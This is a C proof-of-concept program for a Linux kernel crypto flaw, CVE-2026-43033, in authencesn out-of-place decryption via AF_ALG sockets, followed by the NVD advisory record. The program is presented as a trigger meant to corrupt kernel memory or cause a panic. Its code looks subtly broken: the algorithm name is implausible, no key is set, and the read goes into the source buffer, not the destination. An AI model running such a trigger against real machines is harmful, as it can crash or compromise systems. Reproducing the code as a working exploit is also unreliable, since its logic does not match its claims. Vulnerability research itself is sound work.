CVE-2026-43033

/* * PoC for CVE-2026-43033: Linux Kernel crypto: authencesn OOP decryption issue * This code attempts to trigger the authencesn decryption path with src != dst. * Compile: gcc -o poc_cve2026_43033 poc_cve2026_43033.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <linux/if_alg.h> #include <sys/socket.h> #include <sys/sendfile.h> #define SALG_TYPE "aead" #define SALG_NAME "authencesn(rfc4106(gcm(aes)))" #define DATA_SIZE 64 #define ASSOC_SIZE 16 void trigger_vulnerability() { int tfm_fd, op_fd; struct sockaddr_alg sa = { .salg_family = AF_ALG, .salg_type = SALG_TYPE, .salg_name = SALG_NAME, }; struct msghdr msg = {}; struct iovec iov; char cbuf[CMSG_SPACE(sizeof(struct af_alg_iv) + 16)]; // IV space struct cmsghdr *cmsg; struct af_alg_iv *iv; char src_buf[DATA_SIZE + 32]; // Encrypted data + tag char dst_buf[DATA_SIZE]; // Destination buffer (Different from src) char assoc_buf[ASSOC_SIZE]; // Initialize buffers memset(src_buf, 0x41, sizeof(src_buf)); memset(dst_buf, 0x00, sizeof(dst_buf)); memset(assoc_buf, 0x42, sizeof(assoc_buf)); // 1. Create AF_ALG socket tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0); if (tfm_fd < 0) { perror("socket(AF_ALG)"); return; } // 2. Bind to the authencesn algorithm if (bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("bind"); close(tfm_fd); return; } // 3. Accept a connection (operation fd) op_fd = accept(tfm_fd, NULL, 0); if (op_fd < 0) { perror("accept"); close(tfm_fd); return; } // 4. Setup MSG for decryption with IV and Assoc data // Note: Decryption requires setting the proper key and IV beforehand usually msg.msg_control = cbuf; msg.msg_controllen = sizeof(cbuf); cmsg = CMSG_FIRSTHDR(&msg); cmsg->cmsg_level = SOL_ALG; cmsg->cmsg_type = ALG_SET_IV; cmsg->cmsg_len = CMSG_LEN(sizeof(*iv) + 8); // 8 bytes IV for GCM iv = (struct af_alg_iv *)CMSG_DATA(cmsg); iv->ivlen = 8; memset(iv->iv, 0x01, 8); // 5. Send Associated Data iov.iov_base = assoc_buf; iov.iov_len = sizeof(assoc_buf); msg.msg_iov = &iov; msg.msg_iovlen = 1; if (sendmsg(op_fd, &msg, 0) < 0) { perror("sendmsg assoc"); } // 6. Send encrypted data from src_buf // The kernel will process decryption. If internal logic handles src!=dst incorrectly, // it may corrupt memory or panic. iov.iov_base = src_buf; iov.iov_len = sizeof(src_buf); // Read back into dst_buf (Simulating out-of-place operation) ssize_t len = readv(op_fd, &iov, 1); // Usually sendmsg for op, read for result depending on flags // Alternatively, using sendmsg with op_flags might be needed for specific async flows, // but this demonstrates the API interaction. printf("PoC executed. Check kernel logs for panic/memory corruption.\n"); close(op_fd); close(tfm_fd); } int main() { printf("Attempting to trigger CVE-2026-43033...\n"); trigger_vulnerability(); return 0; }

{"cve": {"id": "CVE-2026-43033", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:47.910", "lastModified": "2026-05-08T18:40:49.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption\n\nWhen decrypting data that is not in-place (src != dst), there is\nno need to save the high-order sequence bits in dst as it could\nsimply be re-copied from the source.\n\nHowever, the data to be hashed need to be rearranged accordingly.\n\n\nThanks,"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.3", "versionEndExcluding": "5.10.254", "matchCriteriaId": "2B6C810F-5E30-41A8-8D8A-CED20C347060"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.204", "matchCriteriaId": "FA800016-0012-4E3F-A528-2A7F378A0A4A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.170", "matchCriteriaId": "E6653854-B188-42DD-B8C5-0143F1956AB1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.137", "matchCriteriaId": "3CA3EF52-168A-4348-8F5F-356C9EB69261"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.85", "matchCriteriaId": "F17D292D-A9B5-4DC7-8002-51AB95335606"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/153d5520c3f9fd62e71c7e7f9e34b59cf411e555", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5466e7d0cd9e4f9cef9d8f18f18b60e7bc1c77e5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/89fe118b6470119b20c04afc36e45b81a69ea11f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8c62f618576519dbed6816fafc623ce592953025", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cded4002d22177e8deaca1f257ecd932c9582b6b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d0c4ff6812386880f30bc64c2921299cc4d7b47f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d589abd8b019b07075fda255ceab8c8e950cdb3f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e02494114ebf7c8b42777c6cd6982f113bfdbec7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}